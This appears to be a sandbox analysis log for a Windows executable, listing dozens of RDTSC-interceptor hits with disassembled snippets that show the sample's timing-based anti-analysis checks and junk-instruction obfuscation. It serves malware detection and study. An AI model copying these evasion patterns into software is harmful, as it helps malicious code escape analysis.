Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EB5376 second address: EB5394 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF208h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EB5394 second address: EB53AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Ch 0x00000007 jo 00007FAAAD0E3C62h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EBAF9D second address: EBAFA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EBAFA5 second address: EBAFC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAAD0E3C67h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EB9D5E second address: EB9D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EBA330 second address: EBA34C instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAAAD0E3C56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007FAAAD0E3C62h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EBA4A6 second address: EBA4B7 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAAACBBF1FCh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EBA7A6 second address: EBA7D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAAAD0E3C5Eh 0x00000011 jng 00007FAAAD0E3C64h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EBA8FC second address: EBA900 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EBA900 second address: EBA910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FAAAD0E3C56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EBA910 second address: EBA916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EBDD2E second address: EBDD63 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAAAD0E3C75h 0x00000008 ja 00007FAAAD0E3C56h 0x0000000e jmp 00007FAAAD0E3C69h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 pushad 0x00000017 jbe 00007FAAAD0E3C56h 0x0000001d push edx 0x0000001e pop edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EBDD63 second address: EBDD69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EBDD69 second address: EBDD84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FAAAD0E3C5Dh 0x0000000a pushad 0x0000000b js 00007FAAAD0E3C56h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E44EA8 second address: E44EAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E44EAE second address: E44EB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E44EB2 second address: E44EBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E80413 second address: E80423 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAAD0E3C5Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E80423 second address: E8046E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+12A336AEh], ecx 0x00000011 lea eax, dword ptr [ebp+12BE3168h] 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007FAAACBBF1F8h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 or ecx, 679A3021h 0x00000037 nop 0x00000038 jne 00007FAAACBBF1FAh 0x0000003e push eax 0x0000003f push esi 0x00000040 push eax 0x00000041 push edx 0x00000042 push esi 0x00000043 pop esi 0x00000044 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E8046E second address: E68012 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007FAAAD0E3C58h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 call dword ptr [ebp+12A334FEh] 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b push ecx 0x0000002c pop ecx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E80EAC second address: E80EB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E68BD3 second address: E68BEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C67h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E68BEE second address: E68BF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E68BF8 second address: E68BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E68BFC second address: E68C3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF1FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FAAACBBF1F8h 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 jnl 00007FAAACBBF223h 0x00000018 push ecx 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c pop eax 0x0000001d pop ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FAAACBBF203h 0x00000025 jmp 00007FAAACBBF1FAh 0x0000002a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EC24DF second address: EC24F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 jmp 00007FAAAD0E3C5Eh 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EC24F6 second address: EC2524 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF207h 0x00000007 pushad 0x00000008 jmp 00007FAAACBBF202h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EC2524 second address: EC252A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EC2945 second address: EC294E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EC294E second address: EC2953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EC2CEC second address: EC2CF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EC2CF1 second address: EC2D09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007FAAAD0E3C56h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EC2D09 second address: EC2D0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EC2E75 second address: EC2E79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EC7ADF second address: EC7B0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF1FFh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FAAACBBF207h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EC839E second address: EC83AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jl 00007FAAAD0E3C56h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EC864A second address: EC864F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EC87B3 second address: EC87B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EC87B8 second address: EC87D6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAAACBBF202h 0x00000008 jbe 00007FAAACBBF1F6h 0x0000000e jnc 00007FAAACBBF1F6h 0x00000014 jo 00007FAAACBBF1FEh 0x0000001a push edi 0x0000001b pop edi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EC8958 second address: EC8960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EC8960 second address: EC8966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EC8EA8 second address: EC8EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EC8EAE second address: EC8EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FAAACBBF1FFh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: ECD608 second address: ECD612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ecx 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E3E395 second address: E3E399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E3E399 second address: E3E39D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E3E39D second address: E3E3A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E3E3A7 second address: E3E3BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAAAD0E3C63h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: ED01F0 second address: ED01F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: ED01F6 second address: ED01FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: ED01FE second address: ED0209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: ED0209 second address: ED020F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: ED020F second address: ED0213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: ED0213 second address: ED0237 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAAAD0E3C56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FAAAD0E3C64h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: ED03BD second address: ED03C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: ED050D second address: ED0511 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: ED0511 second address: ED0522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007FAAACBBF1F8h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: ED0522 second address: ED0527 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EDA1F9 second address: EDA202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: ED8C64 second address: ED8C72 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAAAD0E3C58h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: ED9195 second address: ED919B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: ED919B second address: ED91A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: ED9450 second address: ED9454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: ED9454 second address: ED945A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: ED945A second address: ED947B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FAAACBBF1F6h 0x00000009 jmp 00007FAAACBBF206h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: ED95A7 second address: ED95B1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAAAD0E3C5Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EDC983 second address: EDC998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 js 00007FAAACBBF210h 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FAAACBBF1F6h 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EDC998 second address: EDC9A2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FAAAD0E3C56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EDCC4C second address: EDCC50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EDCC50 second address: EDCC8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FAAAD0E3C69h 0x0000000e jp 00007FAAAD0E3C5Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EE11F2 second address: EE11FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EE0AF3 second address: EE0AFD instructions: 0x00000000 rdtsc 0x00000002 je 00007FAAAD0E3C6Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EE0AFD second address: EE0B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAACBBF1FEh 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EE0B12 second address: EE0B18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EE0DDD second address: EE0DEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EE0DEA second address: EE0DEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EE97B2 second address: EE97B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EE97B6 second address: EE97BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EE97BC second address: EE97C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EE7D5E second address: EE7D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EE8016 second address: EE801C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EE8332 second address: EE8336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EF199B second address: EF19C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 jo 00007FAAACBBF225h 0x0000000d jmp 00007FAAACBBF203h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FAAACBBF1FAh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EF19C7 second address: EF19CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EF1C72 second address: EF1C8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FAAACBBF1F6h 0x0000000a jmp 00007FAAACBBF203h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EF1C8F second address: EF1CB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FAAAD0E3C61h 0x0000000c jmp 00007FAAAD0E3C60h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EF1E4C second address: EF1E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EF1F95 second address: EF1F9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EF1F9B second address: EF1FAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jng 00007FAAACBBF1F6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EF1FAB second address: EF1FDC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FAAAD0E3C66h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007FAAAD0E3C62h 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FAAAD0E3C5Ah 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFBB9F second address: EFBBA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFBBA5 second address: EFBBAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFBBAA second address: EFBBB3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFBBB3 second address: EFBBC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007FAAAD0E3C56h 0x00000011 rdtsc
